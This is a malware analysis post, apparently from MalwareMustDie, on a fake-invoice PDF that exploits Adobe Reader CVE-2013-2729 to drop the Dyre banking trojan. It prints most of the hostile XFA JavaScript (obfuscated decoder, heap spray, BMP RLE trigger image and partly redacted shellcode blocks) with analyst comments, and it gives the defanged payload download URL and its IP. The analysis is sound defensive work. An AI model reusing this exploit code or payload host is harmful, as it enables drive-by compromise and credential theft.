ITW Campaign of Dyre Malware via Explopit CVE-2013-2729 PDF

// #MalwareMustDie! ITW Campaign of Dyre Malware via Explopit CVE-2013-2729 PDF.
// Exploitation: Adobe Reader X BMP/RLE heap corruption
// CVE: CVE-2013-2729
// thanks: @nickschroedl (to force me to wake up+analysing this) @SeraphimDomain (to help recognizing this new malware)
// Tweets:
https://twitter.com/nickschroedl/status/522412815265845248
https://twitter.com/MalwareMustDie/status/522464893090684928
https://twitter.com/SeraphimDomain/status/522464989957746689

//-------------------------
// Sample:
//-------------------------
MD5    : 536445d39de9f19947aa493c1ee57751
SHA256 : 6b6fdc4b116802728ec763ac7b25472046465dd0cf58146b3755e7efcb83f135
File size 465.6 KB ( 476741 bytes )

// PDFiD
   This PDF document has an invalid cross reference table.
   This PDF document contains AcroForm objects. AcroForm Objects can
   specify and launch scripts or actions, that is why they are often
   abused by attackers.
   This PDF document has 1 page, please note that most malicious PDFs have
   only one page.
   This PDF document has 6 object start declarations and 6 object end
   declarations.
   This PDF document has 2 stream object start declarations and 2 stream
   object end declarations.
   This PDF document has a cross reference table (xref).
   This PDF document has a pointer to the cross reference table
   (startxref).
   This PDF document has a trailer dictionary containing entries allowing
   the cross reference table, and thus the file objects, to be read.

// ExifTool
   MIMEType   application/pdf
   FileCreateDate   2014:10:16 04:08:59+01:00
   FileType   PDF
   Linearized   No
   FileAccessDate   2014:10:16 04:08:59+01:00
   Warning   Invalid xref table
   PDFVersion   1.7
   [wait.gif]

// VT Metadata (ITW info)
   First submission 2014-10-15 13:31:37 UTC ( 13 hours, 38 minutes ago )
   Last submission 2014-10-16 03:08:49 UTC ( 1 minute ago )
   File names sample.pdf
              VIRUS_invoice621785.pdf
              invoice621785.pdf
              invoice621785.pdf
              invoice621785.pdf
              BAD-invoice621785.pdf
              536445d39de9f19947aa493c1ee57751.pdf
              vti-rescan
              invoice621785.txt
              invoice621785 - Copy.pdf
              invoice621785.pdf
              file-7580290_pdf
              Virus-invoice621785.pdf
              vti-rescan
              invoice621785.txt
              invoice621785.txt
              invoice621785 - Copy.pdf
              invoice621785.pdf
              file-7580290_pdf
              Virus-invoice621785.pdf
              invoice621785.pdf
              invoice621785b.pdf
              invoice621785.pdf
              base64.pdf
              !!!!VIRUS!!!! invoice621785.pdf
              1.invoice621785.pdf
              attch.pdf
              536445d39de9f19947aa493c1ee57751
              invoice621785.pdf
              invoice621785.pdf
              111111111.pdf
              invoice621785.pdf.malware


// ---------------------------------------
// Hostile script (Javascript detected)
// Analysis is in comment with //MMD: xxxx
// by @unixfreaxjp
// ---------------------------------------

         <script name="im" contentType="application/x-javascript">
                                    // MMD: This part of script will trigger shellcode URLDownloadToCacheFileA
         var oxi = "";
         var JH = "";

            var VMeaD = function(a){return HqmB.call(a,a);};
            var Q5Bm = "";

            String.prototype.trim=function(){return this.replace(/^[\s\n\r\t]+|\s\n\r\t]+$/g, '');};

            function ymE4(zzz, sss, sdsds) {

                switch (zzz)
                {
                  case 1:
                    return AY(sss);
                    break;
                  case 2:
                    return OnVk(sss, sdsds);
                    break;
                  case 3:
                    return Muv0S(sss);
                    break;
                  case 4:
                    return HIZx(sss);
                    break;
                  case 5:
                    return xt4(sss);
                    break;
                }

            }

            function EiBY(x){

                return Et(x);
            }

            function mG05X(n)
            {
              var w = form2.Text100.name;
              var s = [];
              n = n.trim();
              var m = cMZ(Bu4g8);
                  m = cMZ(oCnr);

              var ar = cMZ("[" + m + "]");
              var tt = (w.length > 3) ? 1 : 2;


              for (var i = 0; i &lt; ar.length; i ++)
              {
                var a = ar[i];
                var b = (tt == 1) ? 0x33 : 0x40;
                var j =  ( a &amp; ~b ) | ( ~a &amp; b );
                if ((j &gt;= 33) &amp;&amp; (j &lt;= 126))
                {
                  s[i] = String.fromCharCode(33 + ((j + 14) % 94));
                }
                else
                {
                  s[i] = String.fromCharCode(j);
                }
              }
              return s.join('');
            }


            function a2c(a)
            {
            ter="";

            for (var i in a)
            ter+= String.fromCharCode(a[i]);

            return ter;
            }


function HqmB(a, b, c, d){
            var x = form2.Text100.name;
            var y = this[a];

            x = x + '3';

            return y;
            }

function parOM(aaa) {
                    var ret;
                    var w = form2.Text100.name;
                    var tt = (w.length &gt; 3) ? 1 : 2;
                    ret = (tt == 1) ? VMeaD(aaa) : null;


                return ret;
                }

            var ma = "5t5in55f5o55har5o5ee5a5u5es5a5e";
            var upd = "Srg.rmCCdvlncp";
            var upd0 = "";
            var ii = 0;


            for (var i=0; i &lt; ma.length; i++)
            {
             if(ma[i] != "5")
              upd0 += ma[i];
               else
                upd0 += upd[ii++];

            }

            var cMZ = parOM(upd0.slice(19,23));
            var VUSO = cMZ(upd0.slice(23));
            var ge = [0x33, 0x77, 0x6A, 0x75, 0x71, 0x66, 0x68, 0x6A];
            var z3 = [0x5C, 0x64, 0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x27, 0x29];
            var z4 = [0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x2C, 0x27, 0x29];
            var z1 = [0x28, 0x2F, 0x5B, 0x5E, 0x5C, 0x78, 0x32, 0x46];

            for(var q = 0; q &lt; ge.length; q++)
            Q5Bm += String.fromCharCode(ge[q]-5);

            var z2 = [0x28, 0x2F, 0x5B, 0x5C, 0x78, 0x32, 0x46];

            var Bu4g8 = "n" + Q5Bm + a2c(z1) + a2c(z3);
            var oCnr  = "m" + Q5Bm + a2c(z2) + a2c(z4);

         cMZ(mG05X(xfa.resolveNode("Text101").rawValue));   // MMD: draw za BMP as raw!

         </script>


         <script name="i3d" contentType="application/x-javascript">
            var D4W=0x12e;         // MMD: These are var & arrays to be used in HeapSpray
            var Ibv2 = 200;
            var of4 = 0;
            var KsK = new Array(Ibv2);
            var xS = new Array(Ibv2);
            var URP = new Array(Ibv2);
            var cVqW = new Array(Ibv2/2);
         </script>


         <?templateDesigner expand 1?>
      </variables>


      <subform w="576pt" h="756pt">
         <field name="Image301">
            <ui> <imageEdit/> </ui>
            <value>
            <image1>
            /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgjoxiVYzo
                         xiyGUaTkadfjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgs
dflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghg
fkfhkdertgsdflahegklsdkfbdialzlsdoxiVYzoxiyGUaTkfbdialzaoejgkldfjgibdialzoaerkgjkad
fjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfgh
gfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzlsdkf
bdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflah
egkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflah
egklsdkfbdialzfgjgk56ujhialzlsdkfbdialzigoushjbnklcnbluaeoxiVYzoxiyGUaTrhtgjsbdialz
fdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflah
                        (...)
            jeyrhgjkdfgdfg*/
            </image1>


            <image2>
            /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgj
hdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegkoxiVYzoxiyG
UaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiy
GUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaTlsdkfbdia
lzlsdkfbdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjeyrhg
            (...)
            jkdfgdfg*/
            </image2>


            <image>
 Qk0AAAAACgAUAAAAAABAAAAALgEAAAEAAAABAAgAAQAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAUkdC
QVJHQkEAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAA
Av8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC
                        (...)
/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAvgAAAgBAAAAAAAnBQACAKsAAgCrAAIA
qwACAKsAAgCrAAIAqwACAKsAAgCrAAIAqwACAKsACkxMTExMTExMTEw=
                       </image>

            </value>
         </field>
      </subform>

      <event activity="initialize" name="s9"> // MMD: The initiated of this exploit

         <script contentType="application/x-javascript">
                             // MMD: Known exploit: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
            var i; var j;    // MMD: prep memory layout
            if (i3d.of4 == 0){
               var VYz = "\u5858\u5858\u5678\u1234";  // MMD: Trigger usage of LFH
               var yGUaT = i3d.D4W/2-1-(VYz.length+2+2);

               for (i=0; i &lt; i3d.Ibv2; i+=1)    // MMD: HEAP SPRAY starts here...
                  i3d.KsK[i] = VYz + im.ymE4(1,i) +
                               im.oxi.substring(0, yGUaT) +
                               im.ymE4(1,i) + "";

               for (j=0; j &lt; 1000; j++)
                  for (i=i3d.Ibv2-1; i &gt; i3d.Ibv2/4; i-=10)
                     i3d.KsK[i]=null;
               i3d.of4 = 1;
            }
         </script>


      </event>

         <draw name="Text101" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats..
            <ui>
               <textEdit/>
            </ui>
            <value>

               <text>
               nAB57/Vaod57/ASto19/MqbD19/ibPf19/dUaq19/bsX19/hZqj19/djwh19/sJU19/ciQ74/
wiM68/CyA19/gjVQ95/TAY19/BkG98/hzj30/uPDm117/Onw108/tiEi86/oKIU5/hqE0/JhYZ30/
usK117/YIm108/Bhdo108/MaNB108/PFDn108/JbOL30/CGMs117/VWMI108/yzhj108/yhQB108/xNM108/CjlK30/
oUh117/kZl108/vTFa87/Hhv5/KqKY0/lntm30/OupY117/wKf4/Qtm91/fpK5/vrE84/zAMl30/
zwXA117/Uogl4/qar4/tnt4/Rasi4/afD30/voQK117/Egym87/SQPT1/AkT4/aUb4/DPvN30/

// REDACTED //

Yxyf19/neFH19/RKma19/LHyB19/OEGp19/Ehz19/Zbg112/IBKF5/xBm118/WEX117/aMe112/nnN12/
NHo19/Weo108/MqI122/SlHY81/mPpX108/sExj81/skCl108/fiNA81/IEM108/wBv81/ajgZ108/HxeO105/
svCP108/wiY122/jDB83/NDq83/IFD83/zmd83/egCw83/inu83/FMI83/jGm83/lns89/qBNI57/
OYo19/EmDw19/aMTN19/IBY19/JrIr19/MYaP19/bCb19/rDP19/YxT19/LcEi19/TMLx19/RbB19/
cWW125/quOE57
               </text>
            </value>
            <font typeface="Myriad Pro"/>
            <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
         </draw>


         <draw name="Text102" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats...
            <ui>
               <textEdit/>
            </ui>
            <value>
               <text>
               HdGi57/SVEQ19/bHL19/IEzq19/EzZ19/dRa19/Mub19/WPhU19/Vlq19/VYc19/volf19/
Dsb19/lhR19/WFD116/lIYx1/FpDd112/lKte19/gMJ9/tcqB89/Xsv19/yMHX116/Shc1/VKU112/
RIW19/xIfM8/NVpN89/WAwg57/YMaE57/QZUu19/cVw19/gmwi19/tmX19/lrD19/FTO19/LDW19/
PYqG19/UjjX19/usBd19/AnCr19/OUN19/fsfs116/EQdz1/nJaF112/vOaF19/IIh69/aUCU85/FkBB19/
XMU95/eWm19/tSCt111/OvPr83/ebSW89/lZp57/GPK19/Agx19/YijV19/DHP19/vYA19/HwHC19/

                                 // REDACTED //

iOIW125/tmL89/kmi57/ixHF19/tlc19/udz19/tywc19/xuvx19/QURZ19/jzM19/gYAV19/wOlg19/
qMoN19/tADX19/kKlU19/Bqe5/dtnQ116/tux5/aoud12/ZBy118/qsj110/FWr118/FPew1/KlL112/
rXA11/aHLY5/dwa118/lce110/Sxz7/icC14/HdnR115/Eegv119/aAry5/bFE64/MBpo115/nzsy7/
hTK100/REHt118/RFCP112/MvS117/sjLK5/hmK107/QTw89/lcHy57
               </text>
            </value>
            <font typeface="Myriad Pro"/>
            <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
         </draw>


                           // MMD: form layout is rendered and the bug triggered

      <event activity="docReady" ref="$host" name="EVde">
         <script contentType="application/x-javascript"> // MMD: runs once the page ready

im.cMZ(im.mG05X(xfa.resolveNode("Text102").rawValue));  // MMD: draw za raw!
            </script>

      </event>
   </subform>
   <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
   <?templateDesigner DefaultLanguage JavaScript?>
   <?templateDesigner DefaultRunAt client?>
   <?acrobat JavaScript strictScoping?>
   <?PDFPrintOptions embedViewerPrefs 0?>
   <?PDFPrintOptions embedPrintOnFormOpen 0?>
   <?PDFPrintOptions scalingPrefs 0?>
   <?PDFPrintOptions enforceScalingPrefs 0?>
   <?PDFPrintOptions paperSource 0?>
   <?PDFPrintOptions duplexMode 0?>
   <?templateDesigner DefaultPreviewType interactive?>
   <?templateDesigner DefaultPreviewPagination simplex?>
   <?templateDesigner XDPPreviewFormat 19?>
   <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
   <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
   <?templateDesigner Zoom 119?>
   <?templateDesigner FormTargetVersion 30?>
   <?templateDesigner SaveTaggedPDF 1?>
   <?templateDesigner SavePDFWithEmbeddedFonts 1?>
   <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
<config xmlns="http://www.xfa.org/schema/xci/3.0/">
   <agent name="designer">
      <!--  [0..n]  -->
      <destination>pdf</destination>
      <pdf>
         <!--  [0..n]  -->
         <fontInfo/>
      </pdf>
   </agent>
   <present>
      <!--  [0..n]  -->
      <pdf>
         <!--  [0..n]  -->
         <version>1.7</version>
         <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
         <packets>*</packets>
      </xdp>
   </present>
</config>
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
   <locale name="en_US" desc="English (United States)">
      <calendarSymbols name="gregorian">
         <monthNames>
            <month>January</month>
            <month>February</month>
            <month>March</month>
            <month>April</month>
            <month>May</month>
            <month>June</month>
            <month>July</month>
            <month>August</month>
            <month>September</month>
            <month>October</month>
            <month>November</month>
            <month>December</month>
         </monthNames>
         <monthNames abbr="1">
            <month>Jan</month>
            <month>Feb</month>
            <month>Mar</month>
            <month>Apr</month>
            <month>May</month>
            <month>Jun</month>
            <month>Jul</month>
            <month>Aug</month>
            <month>Sep</month>
            <month>Oct</month>
            <month>Nov</month>
            <month>Dec</month>
         </monthNames>
         <dayNames>
            <day>Sunday</day>
            <day>Monday</day>
            <day>Tuesday</day>
            <day>Wednesday</day>
            <day>Thursday</day>
            <day>Friday</day>
            <day>Saturday</day>
         </dayNames>
         <dayNames abbr="1">
            <day>Sun</day>
            <day>Mon</day>
            <day>Tue</day>
            <day>Wed</day>
            <day>Thu</day>
            <day>Fri</day>
            <day>Sat</day>
         </dayNames>
         <meridiemNames>
            <meridiem>AM</meridiem>
            <meridiem>PM</meridiem>
         </meridiemNames>
         <eraNames>
            <era>BC</era>
            <era>AD</era>
         </eraNames>
      </calendarSymbols>
      <datePatterns>
         <datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
         <datePattern name="long">MMMM D, YYYY</datePattern>
         <datePattern name="med">MMM D, YYYY</datePattern>
         <datePattern name="short">M/D/YY</datePattern>
      </datePatterns>
      <timePatterns>
         <timePattern name="full">h:MM:SS A Z</timePattern>
         <timePattern name="long">h:MM:SS A Z</timePattern>
         <timePattern name="med">h:MM:SS A</timePattern>
         <timePattern name="short">h:MM A</timePattern>
      </timePatterns>
      <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
      <numberPatterns>
         <numberPattern name="numeric">z,zz9.zzz</numberPattern>
         <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
         <numberPattern name="percent">z,zz9%</numberPattern>
      </numberPatterns>
      <numberSymbols>
         <numberSymbol name="decimal">.</numberSymbol>
         <numberSymbol name="grouping">,</numberSymbol>
         <numberSymbol name="percent">%</numberSymbol>
         <numberSymbol name="minus">-</numberSymbol>
         <numberSymbol name="zero">0</numberSymbol>
      </numberSymbols>
      <currencySymbols>
         <currencySymbol name="symbol">$</currencySymbol>
         <currencySymbol name="isoname">USD</currencySymbol>
         <currencySymbol name="decimal">.</currencySymbol>
      </currencySymbols>
      <typefaces>
         <typeface name="Myriad Pro"/>
         <typeface name="Minion Pro"/>
         <typeface name="Courier Std"/>
         <typeface name="Adobe Pi Std"/>
         <typeface name="Adobe Hebrew"/>
         <typeface name="Adobe Arabic"/>
         <typeface name="Adobe Thai"/>
         <typeface name="Kozuka Gothic Pro-VI M"/>
         <typeface name="Kozuka Mincho Pro-VI R"/>
         <typeface name="Adobe Ming Std L"/>
         <typeface name="Adobe Song Std L"/>
         <typeface name="Adobe Myungjo Std M"/>
      </typefaces>
   </locale>
   <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
   <xfa:data xfa:dataNode="dataGroup"/>
</xfa:datasets>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
         <xmp:MetadataDate>2014-08-20T20:14:14Z</xmp:MetadataDate>
         <xmp:CreatorTool>Adobe LiveCycle Designer 11.0</xmp:CreatorTool>
      </rdf:Description>
      <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
         <pdf:Producer>Adobe LiveCycle Designer 11.0</pdf:Producer>
      </rdf:Description>
      <rdf:Description xmlns:desc="http://ns.adobe.com/xfa/promoted-desc/" rdf:about="">
         <desc:version rdf:parseType="Resource">
            <rdf:value>11.0.0.20130303.1.892433.887364</rdf:value>
            <desc:ref>/template/subform[1]</desc:ref>
         </desc:version>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
   <annots/>
</xfdf></xdp:xdp>


// Exploit: CVE-2013-2729

//details:

[quoted] Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727. [/quoted]

[quoted] The issue presented on this CVE is related to the parsing of a BMP file compressed with RLE8.
The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive
PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is
the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code. [/quoted]

[quoted] The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules
allow business to build interactive forms. At its simplest, a template-based grammar defines fields
in which a user provides data. Among others it defines buttons, textfields, choicelists, images and
a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc
as scripting language.  One can build a PDF containing a XFA Form containing an image [/quoted]
Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729

// Hostile URL post exploit:
Malicious API download executed: \KnownDlls\NTMARTA.DLL origin: URLDownloadToCacheFileA
h00p://rlmclahore.com/resources/search/1510out.exe
Network: 70.34.33.140|static-ip-70-34-33-140.net-70-34-33-0.rdns.managed.com.|40561 | 70.34.32.0/21 | MOBILENOW | US | POWERDNN.COM | POWER DNN


// PoC download will be executed per browser/PDF env
https://lh6.googleusercontent.com/-qYEkGH0sWio/VD88vayVXCI/AAAAAAAARZ0/t6UkaJYv32E/s747/003.png

Payload: Dyre
https://www.virustotal.com/en/file/3f23306c3b94fc2d594836e972e32f2cc4a19787ed3d561dc0bfe52970798f70/analysis/

// ---
// MalwareMustDie!